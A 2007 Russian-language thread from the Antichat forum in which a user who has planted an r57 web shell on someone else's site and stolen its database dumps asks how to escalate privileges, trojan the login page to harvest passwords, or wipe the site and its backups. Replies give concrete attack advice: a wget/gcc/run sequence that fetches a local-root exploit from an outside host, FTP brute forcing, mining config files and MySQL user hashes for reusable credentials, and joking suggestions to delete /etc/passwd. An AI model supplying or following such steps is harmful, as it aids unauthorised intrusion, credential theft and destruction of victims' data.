Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

13.09.2007, 15:16
|
UID: 41357
USER: totoro
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
Залит шелл, как дальше?
Всем привет.
Дано: залит классический r57, стянуты дампы баз данных, частично расшифрованы.
Пароли админов похоже слишком сложные, неделя расшифровки результатов не дала.
Посоветуйте, что можно сделать дальше... хотел протроянить login.php форума или сайта, что бы он пароли высылал нешифрованые но шелу не хватает прав.
В общем вопрос такой, как повысить шелл в правах
либо как при этих условиях взломать cpanel (только не брутфорс, скорее всего не поможет)
либо как тупо удалить всё из public_html и каталога выше (полюбому там бэкапы баз есть)
Скриптик то у меня для удаления конечно есть, но как ему дать достаточно прав для меня тоже вопрос.
И ещё, может быть есть способы открыть фтп?
|
|
|

13.09.2007, 16:38
|
UID: 30339
USER: Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
Во-первых, в r57 есть функция фтп брута, во-вторых, повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
|
|
|

13.09.2007, 16:58
|
UID: 34199
USER: Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме: 1392441
Репутация:
161
|
|
командную строку вызвать могёшь?
|
|
|

13.09.2007, 19:37
|
UID: 35509
USER: fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
|
|

13.09.2007, 23:41
|
UID: 26380
USER: Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
Сообщение от fly
А я бы сразу удалил /etc/shadow!!!
прав не хватит. и заливка тогда коту под хвост...
так что лучше удаляй /etc/passwd
|
|
|

13.09.2007, 23:52
|
UID: 35509
USER: fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Да знаю!!Да бы не разводить флейм, надо root или права на Public_html!Кста, а /etc/passwd можно удалить без прав рута, ну ты дал!
|
|
|

14.09.2007, 02:09
|
UID: 41357
USER: totoro
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
первое не походит по тому что конфиги то недоступны, этот сайт один из многих у хочтера. Хостер довольно крупный и мне уж точно сейчас не по зубам.
По части второго, спасибо пищу, почитаю...
командную строку вызвать могёшь?
cmd?  Нет, на сервере не могу.
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1.c - какой споилт, будет ли он там компилироваться?
gcc 1.c -o haked
./haked
id
^^^что это означает? Извините по никсу слаб, просто появилась задача, стараюсь её реализовать.
рекурсивное удаление (т.е. удаление, включая подкаталоги и скрытые файлы).
Так можна удалить файлы даже если их владелец являеться root, или если даже нету прав на их чтение. Только будь осторожен, я бы не советовал прямо удалять все файлы из папки public_html.
Не хватит прав
|
|
|

14.09.2007, 03:32
|
UID: 28932
USER: Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
почитай конфиги сайта, если это не хомяк, то скорее всего есть скрипты для работы с бд ищи в них название конфигурационного файла (config.php,config.inc,config.inc.php,dbconf.php и т.д.) читай этот файл от бд там пароль и логин в чистом виде... пробуй их на другие сервисы на фтп или ssh могут прокатить...
если у тебя будет доступ к базе mysql (хотя врядли если это крутой хостер) то узнавай хеши паролей юзеров бд и бруть их, а потом также пробуй их к ssh и фтп...
__________________
Карфаген должен быть разрушен...
|
|
|

14.09.2007, 05:13
|
UID: 41357
USER: totoro
Новичок
Регистрация: 07.09.2007
Сообщений: 5
Провел на форуме: 4301
Репутация:
-5
|
|
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
|
|
|

14.09.2007, 05:28
|
UID: 28932
USER: Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от totoro
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
мдя... причем тут админы я тебе про базу mysql говорил табличка там есть такая user так вот там хеши зашифрованные алгоритмами mysql или mysql5 (cоответственно 16 и 40 знаков) а если ниче не помогает, то тока рутать (ну или фтп брутить с помощью brutus aet например) тыб сначала написал какая там ось ядро и т.д.
в шелле выполни комманду uname -a и результаты в студию
__________________
Карфаген должен быть разрушен...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|